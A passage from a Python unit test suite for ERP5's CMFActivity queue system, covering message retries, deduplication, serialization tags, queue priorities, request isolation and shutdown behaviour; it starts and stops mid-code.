'something'\n obj = self.portal.organisation_module.newContent(\n portal_type='Organisation',\n title=original_title)\n\n # Monkey patch Organisation to add a failing method\n def failingMethod(self):\n raise ValueError('This method always fail')\n Organisation.failingMethod = failingMethod\n\n # First, index the object.\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n self.assertEqual(len(activity_tool.getMessageList()), 0)\n\n # Insert a failing active object.\n obj.activate().failingMethod()\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n\n # Just wait for the active object to be abandoned.\n self.flushAllActivities(silent=1, loop_size=100)\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n self.assertEqual(activity_tool.getMessageList()[0].processing_node,\n INVOKE_ERROR_STATE)\n\n # Make sure that persistent objects are not present in the connection\n # cache to emulate a restart of Zope. So all volatile attributes will\n # be flushed, and persistent objects will be reloaded.\n activity_tool._p_jar._resetCache()\n\n # Cancel it via the management interface.\n message = activity_tool.getMessageList()[0]\n activity_tool.manageCancel(message.object_path, message.method_id)\n self.commit()\n\n def test_71_RetryMessageExecution(self):\n activity_tool = self.portal.portal_activities\n exec_count = [0]\n # priority does not matter anymore\n priority = random.Random().randint\n def doSomething(self, retry_list):\n i = exec_count[0]\n exec_count[0] = i + 1\n conflict, edit_kw = retry_list[i]\n if edit_kw:\n self.getActivityRuntimeEnvironment().edit(**edit_kw)\n if conflict is not None:\n raise ConflictError if conflict else Exception\n def check(retry_list, **activate_kw):\n fail = retry_list[-1][0] is not None and 1 or 0\n for activity in ActivityTool.activity_dict:\n exec_count[0] = 0\n activity_tool.activate(activity=activity, priority=priority(1,6),\n **activate_kw).doSomething(retry_list)\n self.commit()\n self.flushAllActivities(silent=1)\n self.assertEqual(len(retry_list), exec_count[0])\n self.assertEqual(fail, len(activity_tool.getMessageList()))\n activity_tool.manageCancel(\n activity_tool.getPhysicalPath(), 'doSomething')\n self.commit()\n activity_tool.__class__.doSomething = doSomething\n try:\n ## Default behaviour\n # Usual successful case: activity is run only once\n check([(None, None)])\n # Usual error case: activity is run 6 times before being frozen\n check([(False, None)] * 6)\n # On ConflictError, activity is reexecuted without increasing retry count\n check([(True, None)] * 10 + [(None, None)])\n check([(True, None), (False, None)] * 6)\n ## Customized behaviour\n # Do not retry\n check([(False, {'max_retry': 0})])\n # ... even in case of ConflictError\n check([(True, {'max_retry': 0}),\n (True, {'max_retry': 0, 'conflict_retry': 0})])\n check([(True, None)] * 6, conflict_retry=False)\n # Customized number of retries\n for n in 3, 9:\n check([(False, {'max_retry': n})] * n + [(None, None)])\n check([(False, {'max_retry': n})] * (n + 1))\n # Infinite retry\n for n in 3, 9:\n check([(False, {'max_retry': None})] * n + [(None, None)])\n check([(False, {'max_retry': None})] * n + [(False, {'max_retry': 0})])\n check([(False, {'max_retry': None})] * 9 + [(False, None)])\n\n finally:\n del activity_tool.__class__.doSomething\n\n def test_79_ActivateKwForNewContent(self):\n o1 = self.getOrganisationModule().newContent(\n activate_kw=dict(tag='The Tag'))\n self.commit()\n m, = self.getActivityTool().getMessageList(path=o1.getPath())\n self.assertEqual(m.activity_kw.get('tag'), 'The Tag')\n self.tic()\n\n def test_80_FlushAfterMultipleActivate(self):\n orga_module = self.getOrganisationModule()\n p = orga_module.newContent(portal_type='Organisation')\n self.tic()\n self.assertEqual(p.getDescription(), \"\")\n activity_tool = self.portal.portal_activities\n\n def updateDesc(self):\n d =self.getDescription()\n self.setDescription(d+'a')\n Organisation.updateDesc = updateDesc\n\n # First check dequeue read same message only once\n for i in xrange(10):\n p.activate(activity=\"SQLDict\").updateDesc()\n self.commit()\n\n self.assertEqual(len(activity_tool.getMessageList()), 10)\n self.tic()\n self.assertEqual(p.getDescription(), \"a\")\n\n # Check if there is pending activity after deleting an object\n for i in xrange(10):\n p.activate(activity=\"SQLDict\").updateDesc()\n self.commit()\n\n self.assertEqual(len(activity_tool.getMessageList()), 10)\n activity_tool.flush(p, invoke=0)\n self.commit()\n\n @for_each_activity\n def testCallWithGroupIdParamater(self, activity):\n dedup = activity != 'SQLQueue'\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n # Defined a group method\n foobar_list = []\n def setFoobar(self, object_list):\n foobar_list.append(len(object_list))\n for m in object_list:\n obj = m.object\n obj.foobar += m.kw.get('number', 1)\n m.result = None\n from Products.ERP5Type.Core.Folder import Folder\n Folder.setFoobar = setFoobar\n\n Organisation.getFoobar = lambda self: self.foobar\n\n organisation.foobar = 0\n self.assertEqual(0,organisation.getFoobar())\n\n # Test group_method_id is working without group_id\n for x in xrange(5):\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\").reindexObject(number=1)\n self.commit()\n\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),5)\n activity_tool.tic()\n expected = 1 if dedup else 5\n self.assertEqual(expected, organisation.getFoobar())\n\n\n # Test group_method_id is working with one group_id defined\n for x in xrange(5):\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"1\").reindexObject(number=1)\n self.commit()\n\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),5)\n activity_tool.tic()\n self.assertEqual(expected * 2, organisation.getFoobar())\n\n self.assertEqual([expected, expected], foobar_list)\n del foobar_list[:]\n\n # Test group_method_id is working with many group_id defined\n for x in xrange(5):\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"1\").reindexObject(number=1)\n self.commit()\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"2\").reindexObject(number=3)\n self.commit()\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"1\").reindexObject(number=1)\n self.commit()\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"3\").reindexObject(number=5)\n self.commit()\n\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),20)\n activity_tool.tic()\n self.assertEqual(11 if dedup else 60,\n organisation.getFoobar())\n self.assertEqual([1, 1, 1] if dedup else [5, 5, 10],\n sorted(foobar_list))\n\n def test_84_ActivateKwForWorkflowTransition(self):\n \"\"\"\n Test call of a workflow transition with activate_kw parameter propagate them\n \"\"\"\n o1 = self.getOrganisationModule().newContent()\n self.tic()\n o1.validate(activate_kw=dict(tag='The Tag'))\n self.commit()\n m, = self.getActivityTool().getMessageList(path=o1.getPath())\n self.assertEqual(m.activity_kw.get('tag'), 'The Tag')\n self.tic()\n\n def test_85_LossOfVolatileAttribute(self):\n \"\"\"\n Test that the loss of volatile attribute doesn't loose activities\n \"\"\"\n activity_tool = self.getActivityTool()\n def delete_volatiles():\n for property_id in activity_tool.__dict__.keys():\n if property_id.startswith('_v_'):\n delattr(activity_tool, property_id)\n organisation_module = self.getOrganisationModule()\n active_organisation_module = organisation_module.activate()\n delete_volatiles()\n # Cause a message to be created\n # If the buffer cannot be created, this will raise\n active_organisation_module.getTitle()\n delete_volatiles()\n # Another activity to check that first one did not get lost even if volatile disapears\n active_organisation_module.getId()\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list), 2)\n self.tic()\n\n def test_88_ProcessingMultipleMessagesMustRevertIndividualMessagesOnError(self):\n \"\"\"\n Check that, on queues which support it, processing a batch of multiple\n messages doesn't cause failed ones to becommited along with succesful\n ones.\n\n Queues supporting message batch processing:\n - SQLQueue\n \"\"\"\n activity_tool = self.getActivityTool()\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n active_obj = obj.activate(activity='SQLQueue')\n def appendToTitle(self, to_append, fail=False):\n self.setTitle(self.getTitle() + to_append)\n if fail:\n raise ValueError('This method always fail')\n try:\n Organisation.appendToTitle = appendToTitle\n obj.setTitle('a')\n active_obj.appendToTitle('b')\n active_obj.appendToTitle('c', fail=True)\n active_obj.appendToTitle('d')\n object_id = obj.getId()\n self.commit()\n self.assertEqual(obj.getTitle(), 'a')\n self.assertEqual(activity_tool.countMessage(method_id='appendToTitle'), 3)\n self.flushAllActivities(silent=1, loop_size=100)\n self.assertEqual(sorted(obj.getTitle()), ['a', 'b', 'd'])\n message, = self.getMessageList('SQLQueue', method_id='appendToTitle')\n self.deleteMessageList('SQLQueue', [message])\n finally:\n del Organisation.appendToTitle\n\n def test_89_RequestIsolationInsideSameTic(self):\n \"\"\"\n Check that request information do not leak from one activity to another\n inside the same TIC invocation.\n This only apply to queues supporting batch processing:\n - SQLQueue\n \"\"\"\n obj = self.portal.organisation_module.newContent(portal_type='Organisation', title='Pending')\n marker_id = 'marker_%i' % (random.randint(1, 10), )\n def putMarkerValue(self, marker_id):\n self.REQUEST.set(marker_id, 1)\n def checkMarkerValue(self, marker_id):\n if self.REQUEST.get(marker_id) is not None:\n self.setTitle('Failed')\n else:\n self.setTitle('Success')\n try:\n Organisation.putMarkerValue = putMarkerValue\n Organisation.checkMarkerValue = checkMarkerValue\n obj.activate(activity='SQLQueue', tag='set_first').putMarkerValue(marker_id=marker_id)\n obj.activate(activity='SQLQueue', after_tag='set_first').checkMarkerValue(marker_id=marker_id)\n self.assertEqual(obj.getTitle(), 'Pending')\n self.tic()\n self.assertEqual(obj.getTitle(), 'Success')\n finally:\n del Organisation.putMarkerValue\n del Organisation.checkMarkerValue\n\n def test_globalrequest(self):\n \"\"\"zope.globalrequest.getRequest (also known as Products.Global.get_request)\n should be same as app.REQUEST, also when executing activities.\n \"\"\"\n from zope.globalrequest import getRequest\n get_request_before = getRequest()\n def checkRequest(active_self):\n self.assertIs(getRequest(), active_self.REQUEST)\n\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n Organisation.checkRequest = checkRequest\n try:\n obj.activate(activity='SQLQueue').checkRequest()\n obj.activate(activity='SQLDict').checkRequest()\n self.tic()\n finally:\n del Organisation.checkRequest\n self.assertIs(getRequest(), get_request_before)\n\n @for_each_activity\n def testTryUserNotificationOnActivityFailure(self, activity):\n message_list = self.portal.MailHost._message_list\n del message_list[:]\n portal_activities = self.portal.portal_activities\n countMessage = portal_activities.countMessage\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n def failingMethod(self): raise ValueError('This method always fails')\n Organisation.failingMethod = failingMethod\n try:\n portal_activities.activity_failure_mail_notification = True\n # MESSAGE_NOT_EXECUTED\n obj.activate(activity=activity).failingMethod()\n self.commit()\n self.assertFalse(message_list)\n self.flushAllActivities(silent=1, loop_size=100)\n # Check there is a traceback in the email notification\n sender, recipients, mail = message_list.pop()\n self.assertIn(\"Module %s, line %s, in failingMethod\" % (\n __name__, inspect.getsourcelines(failingMethod)[1]), mail)\n self.assertIn(\"ValueError:\", mail)\n portal_activities.manageClearActivities()\n # MESSAGE_NOT_EXECUTABLE\n obj_path = obj.getPath()\n obj.activate(activity=activity).failingMethod()\n self.commit()\n obj.getParentValue()._delObject(obj.getId())\n self.commit()\n self.assertGreater(countMessage(path=obj_path), 0)\n self.tic()\n self.assertEqual(countMessage(path=obj_path), 0)\n self.assertFalse(message_list)\n finally:\n self.portal.portal_activities.activity_failure_mail_notification = True\n del Organisation.failingMethod\n\n @for_each_activity\n def testTryUserNotificationDisabledOnActivityFailure(self, activity):\n message_list = self.portal.MailHost._message_list\n del message_list[:]\n portal_activities = self.portal.portal_activities\n countMessage = portal_activities.countMessage\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n def failingMethod(self): raise ValueError('This method always fails')\n Organisation.failingMethod = failingMethod\n try:\n portal_activities.activity_failure_mail_notification = False\n # MESSAGE_NOT_EXECUTED\n obj.activate(activity=activity).failingMethod()\n self.commit()\n self.assertFalse(message_list)\n self.flushAllActivities(silent=1, loop_size=100)\n # Check there is a traceback in the email notification\n self.assertFalse(message_list)\n portal_activities.manageClearActivities()\n # MESSAGE_NOT_EXECUTABLE\n obj_path = obj.getPath()\n obj.activate(activity=activity).failingMethod()\n self.commit()\n obj.getParentValue()._delObject(obj.getId())\n self.commit()\n self.assertGreater(countMessage(path=obj_path), 0)\n self.tic()\n self.assertEqual(countMessage(path=obj_path), 0)\n self.assertFalse(message_list)\n finally:\n portal_activities.activity_failure_mail_notification = True\n del Organisation.failingMethod\n\n def test_93_tryUserNotificationRaise(self):\n activity_tool = self.portal.portal_activities\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n original_notifyUser = Message.notifyUser\n def failingMethod(self, *args, **kw):\n raise ValueError('This method always fail')\n Message.notifyUser = failingMethod\n Organisation.failingMethod = failingMethod\n try:\n for activity in ActivityTool.activity_dict:\n obj.activate(activity=activity, priority=6).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = activity_tool.getMessageList(\n activity=activity, method_id='failingMethod')\n self.assertEqual(message.processing_node, INVOKE_ERROR_STATE)\n self.assertTrue(message.retry)\n activity_tool.manageDelete(message.uid, activity)\n self.commit()\n finally:\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n\n @for_each_activity\n def testTryActivityRaiseInCommitDoesNotStallActivityConection(self, activity):\n \"\"\"\n Check that an activity which commit raises (as would a regular conflict\n error be raised in tpc_vote) does not cause activity connection to\n stall.\n \"\"\"\n try:\n Organisation.registerFailingTransactionManager = registerFailingTransactionManager\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n now = DateTime()\n obj.activate(activity=activity).registerFailingTransactionManager()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n self.commit()\n # Check that cmf_activity SQL connection still works\n connection_da = self.portal.cmf_activity_sql_connection()\n self.assertFalse(connection_da._registered)\n connection_da.query('select 1')\n self.assertTrue(connection_da._registered)\n self.commit()\n self.assertFalse(connection_da._registered)\n message, = self.getMessageList(activity)\n self.deleteMessageList(activity, [message])\n finally:\n del Organisation.registerFailingTransactionManager\n\n @for_each_activity\n def testTryActivityRaiseInCommitDoesNotLoseMessages(self, activity):\n \"\"\"\n \"\"\"\n try:\n Organisation.registerFailingTransactionManager = registerFailingTransactionManager\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n now = DateTime()\n obj.activate(activity=activity).registerFailingTransactionManager()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n self.commit()\n message, = self.getMessageList(activity,\n method_id='registerFailingTransactionManager')\n self.deleteMessageList(activity, [message])\n finally:\n del Organisation.registerFailingTransactionManager\n\n @for_each_activity\n def testTryChangeSkinInActivity(self, activity):\n activity_tool = self.getActivityTool()\n def changeSkinToNone(self):\n self.getPortalObject().changeSkin(None)\n Organisation.changeSkinToNone = changeSkinToNone\n try:\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n organisation.activate(activity=activity).changeSkinToNone()\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n self.flushAllActivities(silent=1, loop_size=100)\n finally:\n del Organisation.changeSkinToNone\n\n @for_each_activity\n def testDeduplicatingQueuesDoNotDeleteSimilaritiesBeforeExecution(self,\n activity):\n \"\"\"\n Test that SQLDict does not delete similar messages which have the same\n method_id and path but a different tag before execution.\n \"\"\"\n if activity == 'SQLQueue':\n return\n activity_tool = self.getActivityTool()\n marker = []\n def doSomething(self, other_tag):\n marker.append(self.countMessage(tag=other_tag))\n activity_tool.__class__.doSomething = doSomething\n try:\n # Adds two similar but not the same activities.\n activity_tool.activate(activity=activity, after_tag='foo',\n tag='a').doSomething(other_tag='b')\n activity_tool.activate(activity=activity, after_tag='bar',\n tag='b').doSomething(other_tag='a')\n self.commit()\n activity_tool.tic() # make sure distribution phase was not skipped\n activity_tool.distribute()\n # after distribute, similarities are still there.\n self.assertEqual(len(self.getMessageList(activity)), 2)\n activity_tool.tic()\n self.assertEqual(marker, [1])\n finally:\n del activity_tool.__class__.doSomething\n\n @for_each_activity\n def testDeduplicatingQueuesDoNotDeleteDuplicatesBeforeExecution(self,\n activity):\n \"\"\"\n Test that SQLDict does not delete messages before execution\n even if messages have the same method_id and path and tag.\n There could be other things which differ (ex: serialization_tag) and may\n not all be cheap to check during validation. Validation node is the only\n non-paralelisable Zope-side task around activities, so it should be kept\n simple.\n Deduplication is cheap:\n - inside the transaction which spawned duplicate activities, because it\n has to have created activities around anyway, and can keep track\n - inside the CMFActivity-level processing surrounding activity execution\n because it has to load the activities to process them anyway\n \"\"\"\n if activity == 'SQLQueue':\n return\n activity_tool = self.getActivityTool()\n # Adds two same activities.\n activity_tool.activate(activity=activity, after_tag='foo', priority=2,\n tag='a').getId()\n self.commit()\n uid1, = [x.uid for x in self.getMessageList(activity)]\n activity_tool.activate(activity=activity, after_tag='bar', priority=1,\n tag='a').getId()\n self.commit()\n uid2, = [x.uid for x in self.getMessageList(activity) if x.uid != uid1]\n self.assertEqual(len(activity_tool.getMessageList()), 2)\n activity_tool.distribute()\n # After distribute, duplicate is still present.\n self.assertItemsEqual([uid1, uid2],\n [x.uid for x in self.getMessageList(activity)])\n activity_tool.tic()\n\n def testCheckSQLDictDistributeWithSerializationTagAndGroupMethodId(self):\n \"\"\"\n Distribuation was at some point buggy with this scenario when there was\n activate with the same serialization_tag and one time with a group_method\n id and one without group_method_id :\n foo.activate(serialization_tag='a', group_method_id='x').getTitle()\n foo.activate(serialization_tag='a').getId()\n \"\"\"\n def getMessageList():\n return [\n (x.activity_kw['serialization_tag'], x.processing_node)\n for x in activity_tool.getMessageList()\n ]\n def activate(serialization_tag='a'):\n organisation.activate(\n serialization_tag=serialization_tag,\n group_method_id='portal_catalog/catalogObjectList',\n ).getTitle()\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n activity_tool = self.getActivityTool()\n activate('a')\n self.commit()\n activate('a')\n self.commit()\n # Both activities are queued\n self.assertItemsEqual(\n getMessageList(),\n [\n ('a', -1),\n ('a', -1),\n ],\n )\n activity_tool.distribute()\n # Both activities are validated at the same time.\n # Note: this specific test implmeentation relies on the absence of\n # validation-time deduplication which is not strictly related to\n # serialization_tag behaviour.\n self.assertItemsEqual(\n getMessageList(),\n [\n ('a', 0),\n ('a', 0),\n ],\n )\n activate('a')\n self.commit()\n activate('b')\n self.commit()\n # 3rd & 4th activities queued\n self.assertItemsEqual(\n getMessageList(),\n [\n ('a', 0),\n ('a', 0),\n ('a', -1),\n ('b', -1),\n ],\n )\n activity_tool.distribute()\n # 3rd activity does not get validated, 4th is validated\n self.assertItemsEqual(\n getMessageList(),\n [\n ('a', 0),\n ('a', 0),\n ('a', -1),\n ('b', 0),\n ],\n )\n # 1st, 2nd and 4th are executed, then 3rd gets validated an executed,\n # and the queue ends empty.\n self.tic()\n\n def test_104_interQueuePriorities(self):\n \"\"\"\n Important note: there is no way to really reliably check that this\n feature is correctly implemented, as activity execution order is\n non-deterministic.\n The best which can be done is to check that under certain circumstances\n the activity exeicution order match expectations.\n \"\"\"\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n activity_tool = self.getActivityTool()\n check_result_dict = {}\n def runAndCheck():\n check_result_dict.clear()\n self.commit()\n self.assertEqual(len(check_result_dict), 0)\n self.tic()\n self.assertEqual(len(check_result_dict), 2)\n self.assertTrue(check_result_dict['before_ran'])\n self.assertTrue(check_result_dict['after_ran'])\n def mustRunBefore(self):\n check_result_dict['before_ran'] = 'after_ran' not in check_result_dict\n def mustRunAfter(self):\n check_result_dict['after_ran'] = 'before_ran' in check_result_dict\n Organisation.mustRunBefore = mustRunBefore\n Organisation.mustRunAfter = mustRunAfter\n try:\n # Check that ordering looks good (SQLQueue first)\n organisation.activate(activity='SQLQueue', priority=1).mustRunBefore()\n organisation.activate(activity='SQLDict', priority=2).mustRunAfter()\n runAndCheck()\n # Check that ordering looks good (SQLDict first)\n organisation.activate(activity='SQLDict', priority=1).mustRunBefore()\n organisation.activate(activity='SQLQueue', priority=2).mustRunAfter()\n runAndCheck()\n # Check that tag takes precedence over priority (SQLQueue first by priority)\n organisation.activate(activity='SQLQueue', priority=1, after_tag='a').mustRunAfter()\n organisation.activate(activity='SQLDict', priority=2, tag='a').mustRunBefore()\n runAndCheck()\n # Check that tag takes precedence over priority (SQLDict first by priority)\n organisation.activate(activity='SQLDict', priority=1, after_tag='a').mustRunAfter()\n organisation.activate(activity='SQLQueue', priority=2, tag='a').mustRunBefore()\n runAndCheck()\n finally:\n del Organisation.mustRunBefore\n del Organisation.mustRunAfter\n\n @for_each_activity\n def testCheckActivityRuntimeEnvironment(self, activity):\n document = self.portal.organisation_module\n activity_result = []\n def extractActivityRuntimeEnvironment(self):\n activity_result.append(self.getActivityRuntimeEnvironment())\n document.__class__.doSomething = extractActivityRuntimeEnvironment\n try:\n document.activate(activity=activity).doSomething()\n self.commit()\n # Check that getActivityRuntimeEnvironment raises outside of activities\n self.assertRaises(KeyError, document.getActivityRuntimeEnvironment)\n # Check Runtime isolation\n self.tic()\n # Check that it still raises outside of activities\n self.assertRaises(KeyError, document.getActivityRuntimeEnvironment)\n # Check activity runtime environment instance\n env = activity_result.pop()\n self.assertFalse(activity_result)\n message = env._message\n self.assertEqual(message.line.priority, 1)\n self.assertEqual(message.object_path, document.getPhysicalPath())\n self.assertTrue(message.conflict_retry) # default value\n env.edit(max_retry=0, conflict_retry=False)\n self.assertFalse(message.conflict_retry) # edited value\n self.assertRaises(AttributeError, env.edit, foo='bar')\n finally:\n del document.__class__.doSomething\n\n @for_each_activity\n def testSerializationTag(self, activity):\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n activity_tool = self.getActivityTool()\n # First scenario: activate, distribute, activate, distribute\n # Create first activity and distribute: it must be distributed\n organisation.activate(activity=activity, serialization_tag='1').getTitle()\n self.commit()\n result = activity_tool.getMessageList()\n self.assertEqual(len(result), 1)\n activity_tool.distribute()\n result = activity_tool.getMessageList()\n self.assertEqual(len([x for x in result if x.processing_node == 0]), 1)\n # Create second activity and distribute: it must *NOT* be distributed\n organisation.activate(activity=activity, serialization_tag='1').getTitle()\n self.commit()\n result = activity_tool.getMessageList()\n self.assertEqual(len(result), 2)\n activity_tool.distribute()\n result = activity_tool.getMessageList()\n self.assertEqual(len([x for x in result if x.processing_node == 0]), 1) # Distributed message list len is still 1\n self.tic()\n # Second scenario: activate, activate, distribute\n # Both messages must be distributed (this is different from regular tags)\n organisation.activate(activity=activity, serialization_tag='1', priority=2).getTitle()\n # Use a different method just so that SQLDict doesn't merge both activities prior to insertion.\n organisation.activate(activity=activity, serialization_tag='1', priority=1).getId()\n self.commit()\n result = activity_tool.getMessageList()\n self.assertEqual(len(result), 2)\n activity_tool.distribute()\n result = activity_tool.getMessageList()\n # at most 1 activity for a given serialization tag can be validated\n message, = [x for x in result if x.processing_node == 0]\n self.assertEqual(message.method_id, 'getId')\n # the other one is still waiting for validation\n message, = [x for x in result if x.processing_node == -1]\n self.assertEqual(message.method_id, 'getTitle')\n self.tic()\n # Check that giving a None value to serialization_tag does not confuse\n # CMFActivity\n organisation.activate(activity=activity, serialization_tag=None).getTitle()\n self.tic()\n\n def test_110_testAbsoluteUrl(self):\n # Tests that absolute_url works in activities. The URL generation is based\n # on REQUEST information when the method was activated.\n request = self.portal.REQUEST\n\n request.setServerURL('http', 'test.erp5.org', '9080')\n request.other['PARENTS'] = [self.portal.organisation_module]\n request.setVirtualRoot('virtual_root')\n\n calls = []\n def checkAbsoluteUrl(self):\n calls.append(self.absolute_url())\n Organisation.checkAbsoluteUrl = checkAbsoluteUrl\n\n try:\n o = self.portal.organisation_module.newContent(\n portal_type='Organisation', id='test_obj')\n self.assertEqual(o.absolute_url(),\n 'http://test.erp5.org:9080/virtual_root/test_obj')\n o.activate().checkAbsoluteUrl()\n\n # Reset server URL and virtual root before executing messages.\n # This simulates the case of activities beeing executed with different\n # REQUEST, such as TimerServer.\n # BBB Zope2: port argument below needs to be str in Zope2, but if we provide '443',\n # Zope4 will return absolute_url() with ':443' and Zope2 will return without '443'.\n # This is why we use '444' here.\n request.setServerURL('https', 'anotherhost.erp5.org', '444')\n request.other['PARENTS'] = [self.app]\n request.setVirtualRoot('')\n # obviously, the object url is different\n self.assertEqual(o.absolute_url(),\n 'https://anotherhost.erp5.org:444/%s/organisation_module/test_obj'\n % self.portal.getId())\n\n # but activities are executed using the previous request information\n self.flushAllActivities(loop_size=1000)\n self.assertEqual(calls, ['http://test.erp5.org:9080/virtual_root/test_obj'])\n finally:\n del Organisation.checkAbsoluteUrl\n\n def CheckLocalizerWorks(self, activity):\n FROM_STRING = 'Foo'\n TO_STRING = 'Bar'\n LANGUAGE = 'xx'\n def translationTest(context):\n from Products.ERP5Type.Message import Message\n context.setTitle(context.Base_translateString(FROM_STRING))\n context.setDescription(str(Message('erp5_ui', FROM_STRING)))\n portal = self.portal\n portal.Localizer.erp5_ui.manage_addLanguage(LANGUAGE)\n # Add FROM_STRING to the message catalog\n portal.Localizer.erp5_ui.gettext(FROM_STRING)\n # ...and translate it.\n portal.Localizer.erp5_ui.message_edit(message=FROM_STRING,\n language=LANGUAGE, translation=TO_STRING, note='')\n organisation = portal.organisation_module.newContent(\n portal_type='Organisation')\n self.tic()\n Organisation.translationTest = translationTest\n try:\n REQUEST = organisation.REQUEST\n # Simulate what a browser would have sent to Zope\n REQUEST.environ['HTTP_ACCEPT_LANGUAGE'] = LANGUAGE\n organisation.activate(activity=activity).translationTest()\n self.commit()\n # Remove request parameter to check that it was saved at activate call\n # and restored at message execution.\n del REQUEST.environ['HTTP_ACCEPT_LANGUAGE']\n self.tic()\n finally:\n del Organisation.translationTest\n self.assertEqual(TO_STRING, organisation.getTitle())\n self.assertEqual(TO_STRING, organisation.getDescription())\n\n def test_112_checkLocalizerWorksSQLQueue(self):\n self.CheckLocalizerWorks('SQLQueue')\n\n def test_113_checkLocalizerWorksSQLDict(self):\n self.CheckLocalizerWorks('SQLDict')\n\n def test_114_checkSQLQueueActivitySucceedsAfterActivityChangingSkin(self):\n portal = self.portal\n activity_tool = self.getActivityTool()\n # Check that a reference script can be reached\n script_id = 'ERP5Site_reindexAll'\n self.assertIsNot(getattr(portal, script_id), None)\n # Create a new skin selection\n skin_selection_name = 'test_114'\n portal.portal_skins.manage_skinLayers(add_skin=1, skinpath=[''], skinname=skin_selection_name)\n # Create a dummy document\n organisation = portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n # Set custom methods to call as activities.\n def first(context):\n context.changeSkin(skin_selection_name)\n if getattr(context, script_id, None) is not None:\n raise Exception('%s is not supposed to be found here.' % script_id)\n def second(context):\n # If the wrong skin is selected this will raise.\n getattr(context, script_id)\n Organisation.firstTest = first\n Organisation.secondTest = second\n try:\n organisation.activate(tag='foo', activity='SQLQueue').firstTest()\n organisation.activate(after_tag='foo', activity='SQLQueue').secondTest()\n self.commit()\n gc.disable()\n self.tic()\n gc.enable()\n # Forcibly restore skin selection, otherwise getMessageList would only\n # emit a log when retrieving the ZSQLMethod.\n portal.changeSkin(None)\n finally:\n del Organisation.firstTest\n del Organisation.secondTest\n\n def test_115_checkProcessShutdown(self):\n # Thread execution plan for this test:\n # main ActivityThread ProcessShutdownThread\n # start ActivityThread None None\n # wait for rendez_vous_lock (run) None\n # wait for rendez_vous_lock release rendez_vous_lock None\n # start ProcessShutdownThread wait for activity_lock None\n # release activity_lock wait for activity_lock internal wait\n # wait for activity_thread (finish) internal wait\n # wait for process_shutdown_thread None (finish)\n #\n # This test only checks that:\n # - activity tool can exit between 2 processable activity batches\n # - activity tool won't process activities after process_shutdown was called\n # - process_shutdown returns before Activity.tic()\n # This is not perfect though, since it would require to have access to\n # the waiting queue of CMFActivity's internal lock (is_running_lock) to\n # make sure that it's what is preventing process_shutdown from returning.\n activity_tool = self.getActivityTool()\n organisation = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n self.tic()\n activity_event = threading.Event()\n rendez_vous_event = threading.Event()\n def waitingActivity(context):\n # Inform test that we arrived at rendez-vous.\n rendez_vous_event.set()\n # When this event is available, it means test has called process_shutdown.\n assert activity_event.wait(10)\n original_dequeue = SQLDict.dequeueMessage\n queue_tic_test_dict = {}\n def dequeueMessage(self, activity_tool, processing_node, node_family_id_set):\n # This is a one-shot method, revert after execution\n SQLDict.dequeueMessage = original_dequeue\n result = self.dequeueMessage(activity_tool, processing_node, node_family_id_set)\n queue_tic_test_dict['isAlive'] = process_shutdown_thread.isAlive()\n return result\n SQLDict.dequeueMessage = dequeueMessage\n Organisation.waitingActivity = waitingActivity\n try:\n # Use SQLDict with no group method so that both activities won't be\n # executed in the same batch, letting activity tool a chance to check\n # if execution should stop processing activities.\n organisation.activate(activity='SQLDict', tag='foo').waitingActivity()\n organisation.activate(activity='SQLDict', after_tag='foo').getTitle()\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), 2)\n activity_tool.distribute()\n self.commit()\n\n # Start a tic in another thread, so they can meet at rendez-vous.\n class ActivityThread(threading.Thread):\n def run(self):\n # Call changeskin, since skin selection depend on thread id, and we\n # are in a new thread.\n activity_tool.changeSkin(None)\n activity_tool.tic()\n activity_thread = ActivityThread()\n # Do not try to outlive main thread.\n activity_thread.setDaemon(True)\n # Call process_shutdown in yet another thread because it will wait for\n # running activity to complete before returning, and we need to unlock\n # activity *after* calling process_shutdown to make sure the next\n # activity won't be executed.\n class ProcessShutdownThread(threading.Thread):\n def run(self):\n activity_tool.process_shutdown(3, 0)\n process_shutdown_thread = ProcessShutdownThread()\n # Do not try to outlive main thread.\n process_shutdown_thread.setDaemon(True)\n\n activity_thread.start()\n # Wait at rendez-vous for activity to arrive.\n assert rendez_vous_event.wait(10)\n # Initiate shutdown\n process_shutdown_thread.start()\n try:\n # Let waiting activity finish and wait for thread exit\n activity_event.set()\n activity_thread.join(10)\n assert not activity_thread.is_alive()\n process_shutdown_thread.join(10)\n assert not process_shutdown_thread.is_alive()\n # Check that there is still one activity pending\n message_list = activity_tool.getMessageList()\n 